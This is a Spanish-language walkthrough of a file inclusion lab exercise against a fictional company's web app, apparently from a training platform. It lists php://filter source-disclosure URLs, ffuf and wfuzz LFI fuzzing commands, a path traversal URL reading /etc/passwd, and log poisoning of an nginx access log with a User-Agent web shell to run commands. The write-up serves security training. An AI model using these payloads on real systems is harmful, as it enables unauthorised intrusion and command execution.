File Inclusion

Target(s): 83.136.254.158:42833

Escenario

La empresa INLANEFREIGHT le ha contratado para realizar una evaluación de la aplicación web de uno de sus sitios web públicos. Han pasado por muchas evaluaciones en el pasado, pero han añadido algunas funciones nuevas con prisas y están especialmente preocupados por las vulnerabilidades de inclusión de archivos y recorrido de rutas.

Le han proporcionado una dirección IP de destino y ninguna otra información sobre su sitio web. Realice una evaluación completa de la aplicación web comprobando si hay vulnerabilidades de inclusión de archivos y recorrido de rutas.

Pregunta 1: Evalúa la aplicación web y utiliza diversas técnicas para obtener la ejecución remota de código y encontrar una flag en el directorio raíz del sistema de archivos. Envía el contenido de la bandera como respuesta.

1. A través del navegador accedemos a la siguiente URL:

view-source:http://TARGET:PUERTO/index.php?page=php://filter/read=convert.base64-encode/resource=config

1. Sacamos el contenido que nos importa con la siguiente URL encodeandolo en base64:

view-source:http://TARGET:PUERTO/index.php?page=php://filter/read=convert.base64-encode/resource=index

1. Lo decodeamos con Burp Suite como base64 a texto:

1. Y encontramos el login del admin:

1. Accedemos a http://TARGET:PUERTO/ilf_admin/index.php yvemos un panel en el que podemos ver diferentes tipos de logs:

1. Del cheatsheet cogeremos: Misc > Fuzz LFI payloads

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://83.136.254.158:42833/ilf_admin/index.php?log=FUZZ' -fs 2287

Target(s): 94.237.59.119:57681

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.59.119:57681/ilf_admin/index.php?log=FUZZ' -fs 2287

1. Adaptamos el comando de ffuf a wfuzz porque en mi máquina no sé porque no está:

wfuzz -c -z file,/opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://94.237.59.119:57681/ilf_admin/index.php?log=FUZZ' --hl 0 --hh 0 --hc 200 --hs 2287

1. Vamos adaptando y filtrando respuestas:

wfuzz -c -z file,/opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://94.237.59.119:57681/ilf_admin/index.php?log=FUZZ' --sc 200 --hs "2287"

wfuzz -c -z file,/opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://94.237.59.119:57681/ilf_admin/index.php?log=FUZZ' --sc 200 --hs "2046"

1. Buscamos por tamaño 2046:

wfuzz -c -z file,/opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://94.237.59.119:57681/ilf_admin/index.php?log=FUZZ' --sc 200 --hs 2046

1. En este caso cogeremos el que tiene 17 /:

../../../../../../../../../../../../../../../../../../etc/passwd

1. Accederemos a la URL:

http://TARGET:PUERTO/ilf_admin/index.php?log=../../../../../../../../../../../../../../../../../../etc/passwd

• Vemos que retrocedemos en la ruta adecuadamente y se muestra el contenido de /etc/passwd.

1. Vamos a ver el access.log:

Target(s): 94.237.62.166:54411

http://TARGET.PUERTO/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log

1. Vemos que nos lo muestra, usaremos Burp Suite para capturar la solicitud y replicarla, cambiando el User Agent a una web shell y enviando comandos:

1. El comando pwd funciona. Ahora usaremos este método para listar los archivos en /

1. Localizamos el fichero con la flag. Vamos a visualizar su contenido:

• Tutorial seguido para algunas partes: https://www.youtube.com/watch?v=ev6Dc29dErk